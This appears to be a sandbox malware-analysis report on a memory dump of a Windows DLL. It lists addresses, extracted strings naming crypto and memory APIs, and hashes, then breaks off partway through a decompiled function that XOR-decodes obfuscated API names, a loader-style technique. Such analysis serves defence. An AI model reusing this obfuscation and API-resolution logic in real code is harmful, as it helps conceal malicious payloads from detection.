                                                                                                                                                                                                                                0x736d4b22
                                                                                                                                                                                                                                0x736d4b27
                                                                                                                                                                                                                                0x736d4b27
                                                                                                                                                                                                                                0x736d4b2a
                                                                                                                                                                                                                                0x736d4b32
                                                                                                                                                                                                                                0x736d4b3d
                                                                                                                                                                                                                                0x736d4b48
                                                                                                                                                                                                                                0x736d4b53
                                                                                                                                                                                                                                0x736d4b6d
                                                                                                                                                                                                                                0x736d4b6f
                                                                                                                                                                                                                                0x736d4b71
                                                                                                                                                                                                                                0x736d4b7d
                                                                                                                                                                                                                                0x736d4b84
                                                                                                                                                                                                                                0x736d4b85
                                                                                                                                                                                                                                0x736d4b71
                                                                                                                                                                                                                                0x736d4b8a
                                                                                                                                                                                                                                0x736d4b92
                                                                                                                                                                                                                                0x736d4b9d
                                                                                                                                                                                                                                0x736d4ba8
                                                                                                                                                                                                                                0x736d4bb3
                                                                                                                                                                                                                                0x736d4bcd
                                                                                                                                                                                                                                0x736d4bcf
                                                                                                                                                                                                                                0x736d4bd1
                                                                                                                                                                                                                                0x736d4bdd
                                                                                                                                                                                                                                0x736d4be4
                                                                                                                                                                                                                                0x736d4be5
                                                                                                                                                                                                                                0x736d4bd1
                                                                                                                                                                                                                                0x736d4bf6
                                                                                                                                                                                                                                0x736d4bfb
                                                                                                                                                                                                                                0x736d4bfd
                                                                                                                                                                                                                                0x736d4c07
                                                                                                                                                                                                                                0x736d4c0a
                                                                                                                                                                                                                                0x736d4c18
                                                                                                                                                                                                                                0x736d4c1a
                                                                                                                                                                                                                                0x736d4c20
                                                                                                                                                                                                                                0x736d4c20
                                                                                                                                                                                                                                0x736d4c23
                                                                                                                                                                                                                                0x736d4c24
                                                                                                                                                                                                                                0x736d4c20
                                                                                                                                                                                                                                0x736d4c29
                                                                                                                                                                                                                                0x736d4c2c
                                                                                                                                                                                                                                0x736d4c3c
                                                                                                                                                                                                                                0x736d4c41
                                                                                                                                                                                                                                0x736d4c41
                                                                                                                                                                                                                                0x736d4c44
                                                                                                                                                                                                                                0x736d4c46
                                                                                                                                                                                                                                0x736d4c54
                                                                                                                                                                                                                                0x736d4c56
                                                                                                                                                                                                                                0x736d4c56
                                                                                                                                                                                                                                0x736d4c59
                                                                                                                                                                                                                                0x736d4c5a
                                                                                                                                                                                                                                0x736d4c56
                                                                                                                                                                                                                                0x736d4c5f
                                                                                                                                                                                                                                0x736d4c62
                                                                                                                                                                                                                                0x736d4c72
                                                                                                                                                                                                                                0x736d4c77
                                                                                                                                                                                                                                0x736d4c77
                                                                                                                                                                                                                                0x736d4c7a
                                                                                                                                                                                                                                0x736d4c82
                                                                                                                                                                                                                                0x736d4c8d
                                                                                                                                                                                                                                0x736d4c98
                                                                                                                                                                                                                                0x736d4ca3
                                                                                                                                                                                                                                0x736d4cbd
                                                                                                                                                                                                                                0x736d4cbf
                                                                                                                                                                                                                                0x736d4cc1
                                                                                                                                                                                                                                0x736d4ccd
                                                                                                                                                                                                                                0x736d4cd4
                                                                                                                                                                                                                                0x736d4cd5
                                                                                                                                                                                                                                0x736d4cc1
                                                                                                                                                                                                                                0x736d4cda
                                                                                                                                                                                                                                0x736d4cdf
                                                                                                                                                                                                                                0x736d4ce7
                                                                                                                                                                                                                                0x736d4cef
                                                                                                                                                                                                                                0x736d4d00
                                                                                                                                                                                                                                0x736d4d02
                                                                                                                                                                                                                                0x736d4d10
                                                                                                                                                                                                                                0x736d4d19
                                                                                                                                                                                                                                0x736d4d1d
                                                                                                                                                                                                                                0x736d4d1e
                                                                                                                                                                                                                                0x736d4d10
                                                                                                                                                                                                                                0x736d4d2f
                                                                                                                                                                                                                                0x736d4d34
                                                                                                                                                                                                                                0x736d4d36
                                                                                                                                                                                                                                0x736d4d40
                                                                                                                                                                                                                                0x736d4d43
                                                                                                                                                                                                                                0x736d4d4b
                                                                                                                                                                                                                                0x736d4d50
                                                                                                                                                                                                                                0x736d4d50
                                                                                                                                                                                                                                0x736d4d53
                                                                                                                                                                                                                                0x736d4d54
                                                                                                                                                                                                                                0x736d4d50
                                                                                                                                                                                                                                0x736d4d59
                                                                                                                                                                                                                                0x736d4d5c
                                                                                                                                                                                                                                0x736d4d69
                                                                                                                                                                                                                                0x736d4d6e
                                                                                                                                                                                                                                0x736d4d6e
                                                                                                                                                                                                                                0x736d510e
                                                                                                                                                                                                                                0x736d510e
                                                                                                                                                                                                                                0x736d5111
                                                                                                                                                                                                                                0x736d5113
                                                                                                                                                                                                                                0x736d5121
                                                                                                                                                                                                                                0x736d5123
                                                                                                                                                                                                                                0x736d5123
                                                                                                                                                                                                                                0x736d5126
                                                                                                                                                                                                                                0x736d5127
                                                                                                                                                                                                                                0x736d5123
                                                                                                                                                                                                                                0x736d512c
                                                                                                                                                                                                                                0x736d512f
                                                                                                                                                                                                                                0x736d513f
                                                                                                                                                                                                                                0x736d5144
                                                                                                                                                                                                                                0x736d5144
                                                                                                                                                                                                                                0x736d5147
                                                                                                                                                                                                                                0x736d514f
                                                                                                                                                                                                                                0x736d515a
                                                                                                                                                                                                                                0x736d5165
                                                                                                                                                                                                                                0x736d5170
                                                                                                                                                                                                                                0x736d518a
                                                                                                                                                                                                                                0x736d518c
                                                                                                                                                                                                                                0x736d5190
                                                                                                                                                                                                                                0x736d519c
                                                                                                                                                                                                                                0x736d51a3
                                                                                                                                                                                                                                0x736d51a4
                                                                                                                                                                                                                                0x736d5190
                                                                                                                                                                                                                                0x736d51a9
                                                                                                                                                                                                                                0x736d51ae
                                                                                                                                                                                                                                0x736d51b6
                                                                                                                                                                                                                                0x736d51be
                                                                                                                                                                                                                                0x736d51cf
                                                                                                                                                                                                                                0x736d51d1
                                                                                                                                                                                                                                0x736d51d3
                                                                                                                                                                                                                                0x736d51dc
                                                                                                                                                                                                                                0x736d51e0
                                                                                                                                                                                                                                0x736d51e1
                                                                                                                                                                                                                                0x736d51d3
                                                                                                                                                                                                                                0x736d51f2
                                                                                                                                                                                                                                0x736d51f7
                                                                                                                                                                                                                                0x736d51f9
                                                                                                                                                                                                                                0x736d5203
                                                                                                                                                                                                                                0x736d5206
                                                                                                                                                                                                                                0x736d520e
                                                                                                                                                                                                                                0x736d5210
                                                                                                                                                                                                                                0x736d5210
                                                                                                                                                                                                                                0x736d5213
                                                                                                                                                                                                                                0x736d5214
                                                                                                                                                                                                                                0x736d5210
                                                                                                                                                                                                                                0x736d5219
                                                                                                                                                                                                                                0x736d521c
                                                                                                                                                                                                                                0x736d5229
                                                                                                                                                                                                                                0x736d522e
                                                                                                                                                                                                                                0x736d522e
                                                                                                                                                                                                                                0x736d5231
                                                                                                                                                                                                                                0x736d5233
                                                                                                                                                                                                                                0x736d5241
                                                                                                                                                                                                                                0x736d5243
                                                                                                                                                                                                                                0x736d5243
                                                                                                                                                                                                                                0x736d5246
                                                                                                                                                                                                                                0x736d5247
                                                                                                                                                                                                                                0x736d5243
                                                                                                                                                                                                                                0x736d524c
                                                                                                                                                                                                                                0x736d524f
                                                                                                                                                                                                                                0x736d525f
                                                                                                                                                                                                                                0x736d5264
                                                                                                                                                                                                                                0x736d5264
                                                                                                                                                                                                                                0x736d5267
                                                                                                                                                                                                                                0x736d526f
                                                                                                                                                                                                                                0x736d527a
                                                                                                                                                                                                                                0x736d5285
                                                                                                                                                                                                                                0x736d5290
                                                                                                                                                                                                                                0x736d52aa
                                                                                                                                                                                                                                0x736d52ac
                                                                                                                                                                                                                                0x736d52b0
                                                                                                                                                                                                                                0x736d52bc
                                                                                                                                                                                                                                0x736d52c3
                                                                                                                                                                                                                                0x736d52c4
                                                                                                                                                                                                                                0x736d52b0
                                                                                                                                                                                                                                0x736d52c9
                                                                                                                                                                                                                                0x736d52ce
                                                                                                                                                                                                                                0x736d52d6
                                                                                                                                                                                                                                0x736d52de
                                                                                                                                                                                                                                0x736d52ef
                                                                                                                                                                                                                                0x736d52f1
                                                                                                                                                                                                                                0x736d52f3
                                                                                                                                                                                                                                0x736d52fc
                                                                                                                                                                                                                                0x736d5300
                                                                                                                                                                                                                                0x736d5301
                                                                                                                                                                                                                                0x736d52f3
                                                                                                                                                                                                                                0x736d5312
                                                                                                                                                                                                                                0x736d5317
                                                                                                                                                                                                                                0x736d5319
                                                                                                                                                                                                                                0x736d5323
                                                                                                                                                                                                                                0x736d5326
                                                                                                                                                                                                                                0x736d532e
                                                                                                                                                                                                                                0x736d5330
                                                                                                                                                                                                                                0x736d5330
                                                                                                                                                                                                                                0x736d5333
                                                                                                                                                                                                                                0x736d5334
                                                                                                                                                                                                                                0x736d5330
                                                                                                                                                                                                                                0x736d5339
                                                                                                                                                                                                                                0x736d533c
                                                                                                                                                                                                                                0x736d5349
                                                                                                                                                                                                                                0x736d534e
                                                                                                                                                                                                                                0x736d534e
                                                                                                                                                                                                                                0x736d5351
                                                                                                                                                                                                                                0x736d5353
                                                                                                                                                                                                                                0x736d5361
                                                                                                                                                                                                                                0x736d5363
                                                                                                                                                                                                                                0x736d5363
                                                                                                                                                                                                                                0x736d5366
                                                                                                                                                                                                                                0x736d5367
                                                                                                                                                                                                                                0x736d5363
                                                                                                                                                                                                                                0x736d536c
                                                                                                                                                                                                                                0x736d536f
                                                                                                                                                                                                                                0x736d537f
                                                                                                                                                                                                                                0x736d5384
                                                                                                                                                                                                                                0x736d5384
                                                                                                                                                                                                                                0x736d5786
                                                                                                                                                                                                                                0x736d5789
                                                                                                                                                                                                                                0x736d578a
                                                                                                                                                                                                                                0x736d5786
                                                                                                                                                                                                                                0x736d578f
                                                                                                                                                                                                                                0x736d5792
                                                                                                                                                                                                                                0x736d57a2
                                                                                                                                                                                                                                0x736d57a7
                                                                                                                                                                                                                                0x736d57a7
                                                                                                                                                                                                                                0x736d57aa
                                                                                                                                                                                                                                0x736d57b2
                                                                                                                                                                                                                                0x736d57bd
                                                                                                                                                                                                                                0x736d57c8
                                                                                                                                                                                                                                0x736d57d3
                                                                                                                                                                                                                                0x736d57ed
                                                                                                                                                                                                                                0x736d57ef
                                                                                                                                                                                                                                0x736d57f1
                                                                                                                                                                                                                                0x736d57fd
                                                                                                                                                                                                                                0x736d5804
                                                                                                                                                                                                                                0x736d5805
                                                                                                                                                                                                                                0x736d57f1
                                                                                                                                                                                                                                0x736d580a
                                                                                                                                                                                                                                0x736d5812
                                                                                                                                                                                                                                0x736d581d
                                                                                                                                                                                                                                0x736d5828
                                                                                                                                                                                                                                0x736d5833
                                                                                                                                                                                                                                0x736d584d
                                                                                                                                                                                                                                0x736d584f
                                                                                                                                                                                                                                0x736d5851
                                                                                                                                                                                                                                0x736d585d
                                                                                                                                                                                                                                0x736d5864
                                                                                                                                                                                                                                0x736d5865
                                                                                                                                                                                                                                0x736d5851
                                                                                                                                                                                                                                0x736d5876
                                                                                                                                                                                                                                0x736d587b
                                                                                                                                                                                                                                0x736d587d
                                                                                                                                                                                                                                0x736d5887
                                                                                                                                                                                                                                0x736d588a
                                                                                                                                                                                                                                0x736d5898
                                                                                                                                                                                                                                0x736d589a
                                                                                                                                                                                                                                0x736d58a0
                                                                                                                                                                                                                                0x736d58a0
                                                                                                                                                                                                                                0x736d58a3
                                                                                                                                                                                                                                0x736d58a4
                                                                                                                                                                                                                                0x736d58a0
                                                                                                                                                                                                                                0x736d58a9
                                                                                                                                                                                                                                0x736d58ac
                                                                                                                                                                                                                                0x736d58bc
                                                                                                                                                                                                                                0x736d58c1
                                                                                                                                                                                                                                0x736d58c1
                                                                                                                                                                                                                                0x736d58c4
                                                                                                                                                                                                                                0x736d58c6
                                                                                                                                                                                                                                0x736d58d4
                                                                                                                                                                                                                                0x736d58d6
                                                                                                                                                                                                                                0x736d58d6
                                                                                                                                                                                                                                0x736d58d9
                                                                                                                                                                                                                                0x736d58da
                                                                                                                                                                                                                                0x736d58d6
                                                                                                                                                                                                                                0x736d58df
                                                                                                                                                                                                                                0x736d58e2
                                                                                                                                                                                                                                0x736d58f2
                                                                                                                                                                                                                                0x736d58f7
                                                                                                                                                                                                                                0x736d58f7
                                                                                                                                                                                                                                0x736d58fa
                                                                                                                                                                                                                                0x736d5902
                                                                                                                                                                                                                                0x736d590d
                                                                                                                                                                                                                                0x736d5918
                                                                                                                                                                                                                                0x736d5923
                                                                                                                                                                                                                                0x736d593d
                                                                                                                                                                                                                                0x736d593f
                                                                                                                                                                                                                                0x736d5941
                                                                                                                                                                                                                                0x736d594d
                                                                                                                                                                                                                                0x736d5954
                                                                                                                                                                                                                                0x736d5955
                                                                                                                                                                                                                                0x736d5941
                                                                                                                                                                                                                                0x736d595a
                                                                                                                                                                                                                                0x736d5962
                                                                                                                                                                                                                                0x736d596d
                                                                                                                                                                                                                                0x736d5978
                                                                                                                                                                                                                                0x736d5983
                                                                                                                                                                                                                                0x736d599d
                                                                                                                                                                                                                                0x736d599f
                                                                                                                                                                                                                                0x736d59a1
                                                                                                                                                                                                                                0x736d59ad
                                                                                                                                                                                                                                0x736d59b4
                                                                                                                                                                                                                                0x736d59b5
                                                                                                                                                                                                                                0x736d59a1
                                                                                                                                                                                                                                0x736d59c6
                                                                                                                                                                                                                                0x736d59cb
                                                                                                                                                                                                                                0x736d59cd
                                                                                                                                                                                                                                0x736d59d7
                                                                                                                                                                                                                                0x736d59da
                                                                                                                                                                                                                                0x736d59e8
                                                                                                                                                                                                                                0x736d59ea
                                                                                                                                                                                                                                0x736d59f0
                                                                                                                                                                                                                                0x736d59f0
                                                                                                                                                                                                                                0x736d59f3
                                                                                                                                                                                                                                0x736d59f4
                                                                                                                                                                                                                                0x736d59f0
                                                                                                                                                                                                                                0x736d59f9
                                                                                                                                                                                                                                0x736d59fc
                                                                                                                                                                                                                                0x736d5a0c
                                                                                                                                                                                                                                0x736d5a11
                                                                                                                                                                                                                                0x736d5a11
                                                                                                                                                                                                                                0x736d5a14
                                                                                                                                                                                                                                0x736d5a16
                                                                                                                                                                                                                                0x736d5a24
                                                                                                                                                                                                                                0x736d5a26
                                                                                                                                                                                                                                0x736d5a26
                                                                                                                                                                                                                                0x736d5a29
                                                                                                                                                                                                                                0x736d5a2a
                                                                                                                                                                                                                                0x736d5a26
                                                                                                                                                                                                                                0x736d5a2f
                                                                                                                                                                                                                                0x736d5a32
                                                                                                                                                                                                                                0x736d5a42
                                                                                                                                                                                                                                0x736d5a47
                                                                                                                                                                                                                                0x736d5a47
                                                                                                                                                                                                                                0x736d5a4a
                                                                                                                                                                                                                                0x736d5a52

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: OxtHeapAlloc$ UxtHeapReAlloc$$yH$7\o8$9GGL$<fS$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$B]~$B^`"$CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptImportKey$CryptReleaseContext$CryptSetKeyParam$GetProcessHeap$HeapFree$HeapSize$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$Km2$VirtualAlloc$VirtualFree$VirtualProtect$`gxtVirtualQuery$n/v$d/{$e"
                                                                                                                                                                                                                                • API String ID: 0-1114865788
                                                                                                                                                                                                                                • Opcode ID: ac2a034776c43a60a8132d3a0496f08a25883471731790b24b611c332d5370db
                                                                                                                                                                                                                                • Instruction ID: c5e948a52362b1b4cd3424fcc318d593ffbf6df6df485cf9a7048a6aa91476c7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac2a034776c43a60a8132d3a0496f08a25883471731790b24b611c332d5370db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41A2B3B052C3C49FE726DF14D585BEBBBE4AB82308F59086DD1CB8A6D2E73194448B47
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 98%
                                                                                                                                                                                                                                			E736D48B0(void* __edi) {
                                                                                                                                                                                                                                				intOrPtr _v7;
                                                                                                                                                                                                                                				intOrPtr _v11;
                                                                                                                                                                                                                                				intOrPtr _v15;
                                                                                                                                                                                                                                				intOrPtr _v19;
                                                                                                                                                                                                                                				intOrPtr _v23;
                                                                                                                                                                                                                                				char _v27;
                                                                                                                                                                                                                                				char _v31;
                                                                                                                                                                                                                                				intOrPtr _v35;
                                                                                                                                                                                                                                				intOrPtr _v39;
                                                                                                                                                                                                                                				intOrPtr _v43;
                                                                                                                                                                                                                                				intOrPtr _v47;
                                                                                                                                                                                                                                				char _v51;
                                                                                                                                                                                                                                				char _v55;
                                                                                                                                                                                                                                				intOrPtr _v59;
                                                                                                                                                                                                                                				intOrPtr _v63;
                                                                                                                                                                                                                                				intOrPtr _v67;
                                                                                                                                                                                                                                				intOrPtr _v71;
                                                                                                                                                                                                                                				char _v75;
                                                                                                                                                                                                                                				char _v79;
                                                                                                                                                                                                                                				intOrPtr _v83;
                                                                                                                                                                                                                                				intOrPtr _v87;
                                                                                                                                                                                                                                				intOrPtr _v91;
                                                                                                                                                                                                                                				char _v95;
                                                                                                                                                                                                                                				char _v99;
                                                                                                                                                                                                                                				intOrPtr _v103;
                                                                                                                                                                                                                                				intOrPtr _v107;
                                                                                                                                                                                                                                				intOrPtr _v111;
                                                                                                                                                                                                                                				char _v115;
                                                                                                                                                                                                                                				char _v119;
                                                                                                                                                                                                                                				intOrPtr _v123;
                                                                                                                                                                                                                                				intOrPtr _v127;
                                                                                                                                                                                                                                				intOrPtr _v131;
                                                                                                                                                                                                                                				char _v135;
                                                                                                                                                                                                                                				char _v139;
                                                                                                                                                                                                                                				intOrPtr _v143;
                                                                                                                                                                                                                                				intOrPtr _v147;
                                                                                                                                                                                                                                				intOrPtr _v151;
                                                                                                                                                                                                                                				char _v155;
                                                                                                                                                                                                                                				char _v159;
                                                                                                                                                                                                                                				intOrPtr _v163;
                                                                                                                                                                                                                                				intOrPtr _v167;
                                                                                                                                                                                                                                				intOrPtr _v171;
                                                                                                                                                                                                                                				char _v175;
                                                                                                                                                                                                                                				char _v179;
                                                                                                                                                                                                                                				intOrPtr _v183;
                                                                                                                                                                                                                                				intOrPtr _v187;
                                                                                                                                                                                                                                				intOrPtr _v191;
                                                                                                                                                                                                                                				char _v195;
                                                                                                                                                                                                                                				char _v199;
                                                                                                                                                                                                                                				intOrPtr _v203;
                                                                                                                                                                                                                                				intOrPtr _v207;
                                                                                                                                                                                                                                				intOrPtr _v211;
                                                                                                                                                                                                                                				char _v215;
                                                                                                                                                                                                                                				char _v219;
                                                                                                                                                                                                                                				intOrPtr _v223;
                                                                                                                                                                                                                                				intOrPtr _v227;
                                                                                                                                                                                                                                				intOrPtr _v231;
                                                                                                                                                                                                                                				char _v235;
                                                                                                                                                                                                                                				char _v239;
                                                                                                                                                                                                                                				intOrPtr _v243;
                                                                                                                                                                                                                                				intOrPtr _v247;
                                                                                                                                                                                                                                				intOrPtr _v251;
                                                                                                                                                                                                                                				char _v255;
                                                                                                                                                                                                                                				char _v259;
                                                                                                                                                                                                                                				intOrPtr _v263;
                                                                                                                                                                                                                                				intOrPtr _v267;
                                                                                                                                                                                                                                				intOrPtr _v271;
                                                                                                                                                                                                                                				char _v275;
                                                                                                                                                                                                                                				char _v279;
                                                                                                                                                                                                                                				intOrPtr _v283;
                                                                                                                                                                                                                                				intOrPtr _v287;
                                                                                                                                                                                                                                				intOrPtr _v291;
                                                                                                                                                                                                                                				char _v295;
                                                                                                                                                                                                                                				char _v299;
                                                                                                                                                                                                                                				intOrPtr _v303;
                                                                                                                                                                                                                                				intOrPtr _v307;
                                                                                                                                                                                                                                				intOrPtr _v311;
                                                                                                                                                                                                                                				char _v315;
                                                                                                                                                                                                                                				char _v319;
                                                                                                                                                                                                                                				intOrPtr _v323;
                                                                                                                                                                                                                                				intOrPtr _v327;
                                                                                                                                                                                                                                				intOrPtr _v331;
                                                                                                                                                                                                                                				char _v335;
                                                                                                                                                                                                                                				char _v339;
                                                                                                                                                                                                                                				intOrPtr _v343;
                                                                                                                                                                                                                                				intOrPtr _v347;
                                                                                                                                                                                                                                				intOrPtr _v351;
                                                                                                                                                                                                                                				char _v355;
                                                                                                                                                                                                                                				char _v359;
                                                                                                                                                                                                                                				intOrPtr _v363;
                                                                                                                                                                                                                                				intOrPtr _v367;
                                                                                                                                                                                                                                				intOrPtr _v371;
                                                                                                                                                                                                                                				char _v375;
                                                                                                                                                                                                                                				char _v379;
                                                                                                                                                                                                                                				intOrPtr _v383;
                                                                                                                                                                                                                                				intOrPtr _v387;
                                                                                                                                                                                                                                				intOrPtr _v391;
                                                                                                                                                                                                                                				char _v395;
                                                                                                                                                                                                                                				char _v399;
                                                                                                                                                                                                                                				intOrPtr _v403;
                                                                                                                                                                                                                                				intOrPtr _v407;
                                                                                                                                                                                                                                				intOrPtr _v411;
                                                                                                                                                                                                                                				char _v415;
                                                                                                                                                                                                                                				char _v419;
                                                                                                                                                                                                                                				intOrPtr _v423;
                                                                                                                                                                                                                                				intOrPtr _v427;
                                                                                                                                                                                                                                				intOrPtr _v431;
                                                                                                                                                                                                                                				char _v435;
                                                                                                                                                                                                                                				char _v439;
                                                                                                                                                                                                                                				intOrPtr _v443;
                                                                                                                                                                                                                                				intOrPtr _v447;
                                                                                                                                                                                                                                				intOrPtr _v451;
                                                                                                                                                                                                                                				char _v455;
                                                                                                                                                                                                                                				char _v459;
                                                                                                                                                                                                                                				intOrPtr _v463;
                                                                                                                                                                                                                                				intOrPtr _v467;
                                                                                                                                                                                                                                				intOrPtr _v471;
                                                                                                                                                                                                                                				char _v475;
                                                                                                                                                                                                                                				char _v479;
                                                                                                                                                                                                                                				intOrPtr _v484;
                                                                                                                                                                                                                                				intOrPtr _v488;
                                                                                                                                                                                                                                				intOrPtr _v492;
                                                                                                                                                                                                                                				char _v495;
                                                                                                                                                                                                                                				intOrPtr _v496;
                                                                                                                                                                                                                                				char _v500;
                                                                                                                                                                                                                                				intOrPtr _v504;
                                                                                                                                                                                                                                				intOrPtr _v508;
                                                                                                                                                                                                                                				intOrPtr _v512;
                                                                                                                                                                                                                                				char _v515;
                                                                                                                                                                                                                                				intOrPtr _v516;
                                                                                                                                                                                                                                				char _v519;
                                                                                                                                                                                                                                				char _v520;
                                                                                                                                                                                                                                				intOrPtr _v523;
                                                                                                                                                                                                                                				intOrPtr _v527;
                                                                                                                                                                                                                                				char _v531;
                                                                                                                                                                                                                                				char _v535;
                                                                                                                                                                                                                                				intOrPtr _v539;
                                                                                                                                                                                                                                				intOrPtr _v543;
                                                                                                                                                                                                                                				char _v547;
                                                                                                                                                                                                                                				char _v551;
                                                                                                                                                                                                                                				intOrPtr _v555;
                                                                                                                                                                                                                                				intOrPtr _v559;
                                                                                                                                                                                                                                				char _v563;
                                                                                                                                                                                                                                				char _v567;
                                                                                                                                                                                                                                				intOrPtr _v571;
                                                                                                                                                                                                                                				intOrPtr _v575;
                                                                                                                                                                                                                                				char _v579;
                                                                                                                                                                                                                                				char _v583;
                                                                                                                                                                                                                                				intOrPtr _v587;
                                                                                                                                                                                                                                				intOrPtr _v591;
                                                                                                                                                                                                                                				char _v595;
                                                                                                                                                                                                                                				char _v599;
                                                                                                                                                                                                                                				char* _t514;
                                                                                                                                                                                                                                				char* _t515;
                                                                                                                                                                                                                                				char* _t519;
                                                                                                                                                                                                                                				char* _t520;
                                                                                                                                                                                                                                				char* _t524;
                                                                                                                                                                                                                                				char* _t525;
                                                                                                                                                                                                                                				char* _t529;
                                                                                                                                                                                                                                				char* _t530;
                                                                                                                                                                                                                                				char* _t534;
                                                                                                                                                                                                                                				char* _t535;
                                                                                                                                                                                                                                				char* _t539;
                                                                                                                                                                                                                                				char* _t540;
                                                                                                                                                                                                                                				char* _t544;
                                                                                                                                                                                                                                				char* _t545;
                                                                                                                                                                                                                                				char* _t549;
                                                                                                                                                                                                                                				char* _t550;
                                                                                                                                                                                                                                				char* _t554;
                                                                                                                                                                                                                                				char* _t555;
                                                                                                                                                                                                                                				char* _t559;
                                                                                                                                                                                                                                				char* _t560;
                                                                                                                                                                                                                                				char* _t564;
                                                                                                                                                                                                                                				char* _t565;
                                                                                                                                                                                                                                				char* _t569;
                                                                                                                                                                                                                                				char* _t570;
                                                                                                                                                                                                                                				char* _t574;
                                                                                                                                                                                                                                				char* _t575;
                                                                                                                                                                                                                                				char* _t579;
                                                                                                                                                                                                                                				char* _t580;
                                                                                                                                                                                                                                				char* _t584;
                                                                                                                                                                                                                                				char* _t585;
                                                                                                                                                                                                                                				void* _t705;
                                                                                                                                                                                                                                				void* _t707;
                                                                                                                                                                                                                                				void* _t709;
                                                                                                                                                                                                                                				void* _t711;
                                                                                                                                                                                                                                				void* _t713;
                                                                                                                                                                                                                                				void* _t715;
                                                                                                                                                                                                                                				void* _t717;
	void* _t719;
	void* _t721;
	void* _t723;
	void* _t725;
	void* _t727;
	void* _t729;
	void* _t731;
	void* _t733;
	void* _t735;
	void* _t737;
	void* _t739;
	void* _t741;
	void* _t743;
	void* _t745;
	void* _t747;
	void* _t749;
	void* _t751;
	void* _t753;
	void* _t755;
	void* _t757;
	void* _t759;
	void* _t761;
	void* _t763;
	signed int _t765;
	signed int _t766;
	signed int _t767;
	signed int _t768;
	signed int _t769;
	signed int _t770;
	signed int _t771;
	signed int _t772;
	signed int _t773;
	signed int _t774;
	signed int _t775;
	signed int _t776;
	signed int _t777;
	signed int _t778;
	signed int _t779;
	signed int _t780;
	signed int _t781;
	signed int _t782;
	signed int _t783;
	signed int _t784;
	signed int _t785;
	signed int _t786;
	signed int _t787;
	signed int _t788;
	signed int _t789;
	signed int _t790;
	signed int _t791;
	signed int _t792;
	signed int _t793;
	signed int _t794;
	void* _t795;
	signed int _t796;
	void* _t798;
	void* _t799;
	void* _t800;
	void* _t801;
	void* _t802;
	void* _t803;
	void* _t804;
	void* _t805;
	void* _t806;
	void* _t807;
	void* _t808;
	void* _t809;
	void* _t810;
	void* _t811;
	void* _t812;
	void* _t813;
	void* _t814;
                                                                                                                                                                                                                                
	_t795 = __edi;
	_t798 = (_t796 & 0xfffffff8) - 0x258;
	_v500 = 0;
	_v496 = 0x442c1809;
	_v492 = 0x384d1107;
	_v488 = 0x6612396c;
	_v484 = 0xa7e5d42;
	if(_v500 == 0) {
		_t794 = 0;
		do {
			 *(_t798 + 0x6c + _t794 * 4) =  *(_t798 + 0x6c + _t794 * 4) ^ 0x0a7e5d42;
			_t794 = _t794 + 1;
		} while (_t794 < 4);
	}
	_v520 = 0;
	_v516 = 0x55905f81;
	_v512 = 0x608e57a2;
	_v508 = 0x428d5abb;
	_v504 = 0x21e236d7;
	_t799 = _t798 + 1;
	asm("xlatb");
	asm("loop 0x24");
	if(_v519 == 0) {
		_t793 = 0;
		asm("o16 nop [eax+eax]");
		do {
			 *(_t799 + 0x58 + _t793 * 4) =  *(_t799 + 0x58 + _t793 * 4) ^ 0x21e236d7;
			_t793 = _t793 + 1;
		} while (_t793 < 4);
	}
	E736D7DE0(_t795, "VirtualAlloc", 0, 0x200);
	_t705 = 0;
	 *0x736efd48 = 0;
	_t800 = _t799 + 0xc;
	_t514 =  &_v515;
	if(_v515 != 0) {
		do {
			_t514 = _t514 + 1;
			_t705 = _t705 + 1;
		} while ( *_t514 != 0);
	}
	_t706 = _t705 + 1;
	if(_t705 + 1 != 0) {
		E736D82C0("VirtualAlloc",  &_v515, _t706);
		_t800 = _t800 + 0xc;
	}
	_t707 = 0;
	_t515 =  &_v495;
	if(_v495 != 0) {
		do {
			_t515 = _t515 + 1;
			_t707 = _t707 + 1;
		} while ( *_t515 != 0);
	}
	_t708 = _t707 + 1;
	if(_t707 + 1 != 0) {
		E736D82C0("KERNEL32.dll",  &_v495, _t708);
		_t800 = _t800 + 0xc;
	}
	_v459 = 0;
	_v455 = 0x59114582;
	_v451 = 0x25704c8c;
	_v447 = 0x7b2f64e7;
	_v443 = 0x174300c9;
	if(_v459 == 0) {
		_t792 = 0;
		do {
			 *(_t800 + 0x94 + _t792 * 4) =  *(_t800 + 0x94 + _t792 * 4) ^ 0x174300c9;
			_t792 = _t792 + 1;
		} while (_t792 < 4);
	}
	_v479 = 0;
	_v475 = 0x1a6ef159;
	_v471 = 0x3e70f97a;
	_v467 = 0xb68f77d;
                                                                                                                                                                                                                                				_v463 = 0x6e1cec6c;
                                                                                                                                                                                                                                				if(_v479 == 0) {
                                                                                                                                                                                                                                					_t791 = 0;
                                                                                                                                                                                                                                					asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t800 + 0x80 + _t791 * 4) =  *(_t800 + 0x80 + _t791 * 4) ^ 0x6e1c980f;
                                                                                                                                                                                                                                						_t791 = _t791 + 1;
                                                                                                                                                                                                                                					} while (_t791 < 4);
                                                                                                                                                                                                                                				}
